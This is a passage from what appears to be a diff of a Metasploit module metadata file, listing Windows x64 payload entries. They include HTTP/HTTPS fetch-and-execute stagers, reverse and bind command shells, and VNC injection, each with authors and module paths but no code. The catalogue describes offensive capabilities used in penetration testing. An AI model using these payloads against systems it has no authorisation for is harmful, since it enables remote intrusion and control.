"sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/shell/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/shell/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/shell/bind_tcp_rc4": { - "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/shell/bind_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/shell/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/shell/reverse_tcp_rc4": { - "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/shell/reverse_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/shell_bind_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/http/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/shell_reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/http/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/vncinject/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/vncinject/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/vncinject/bind_tcp_rc4": { - "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/vncinject/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_http": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_https": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_tcp_rc4": { - "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_winhttp": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_winhttps": { - "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/https/x64/custom/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/custom/bind_named_pipe": { - "name": 